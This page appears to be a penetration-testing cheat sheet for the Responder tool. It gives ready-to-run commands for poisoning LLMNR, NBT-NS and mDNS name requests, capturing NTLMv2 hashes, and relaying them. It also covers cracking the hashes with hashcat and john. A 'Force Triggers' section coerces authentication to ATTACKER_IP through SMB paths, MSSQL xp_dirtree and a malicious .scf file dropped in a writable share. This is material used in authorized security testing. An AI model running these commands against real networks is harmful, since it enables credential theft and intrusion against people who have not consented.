Responder - BookJMP

Overview

Poisons LLMNR, NBT-NS, and mDNS requests on local network. When victim fails DNS resolution, Responder answers and captures NTLMv2 hash.

Basic Usage

responder -I eth0
responder -I eth0 -wv              # WPAD proxy + verbose

Analyze Mode (Passive)

Listen without poisoning — see what’s on the network.

responder -I eth0 -A

Common Flags

Flag	Description
`-I`	Interface
`-A`	Analyze mode (passive)
`-w`	Start WPAD proxy
`-v`	Verbose
`-f`	Fingerprint hosts
`-P`	Force NTLM auth for proxy
`-b`	Return basic HTTP auth

Disable Services (For Relay)

When using with ntlmrelayx, disable SMB and HTTP so relay tool handles them.

# /etc/responder/Responder.conf
SMB = Off
HTTP = Off

responder -I eth0

Captured Hashes

# Location
/usr/share/responder/logs/

# Format: NTLMv2
cat /usr/share/responder/logs/SMB-NTLMv2-*.txt

Crack NTLMv2

Hashcat

hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt

John

john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt

Force Triggers

If no traffic captured naturally, force NTLM auth:

# From compromised host — trigger SMB auth
dir \\ATTACKER_IP\share
net use \\ATTACKER_IP\share

# Via MSSQL
EXEC xp_dirtree '\\ATTACKER_IP\share';

# Via shortcut file (.lnk/.scf) in writable share

[Shell]
Command=2
IconFile=\\ATTACKER_IP\share\icon.ico
[Taskbar]
Command=ToggleDesktop

Drop as @file.scf in writable share (@ sorts to top).

MultiRelay (Responder Tool)

python /usr/share/responder/tools/MultiRelay.py -t TARGET -u ALL

Quick Reference

Task	Command
Capture	`responder -I eth0`
Passive	`responder -I eth0 -A`
With WPAD	`responder -I eth0 -wv`
Crack	`hashcat -m 5600 hash.txt wordlist`
Logs	`/usr/share/responder/logs/`

Documentation Index

​Overview

​Basic Usage

​Analyze Mode (Passive)

​Common Flags

​Disable Services (For Relay)

​Captured Hashes

​Crack NTLMv2

​Hashcat

​John

​Force Triggers

​SCF File in Share

​MultiRelay (Responder Tool)

​Quick Reference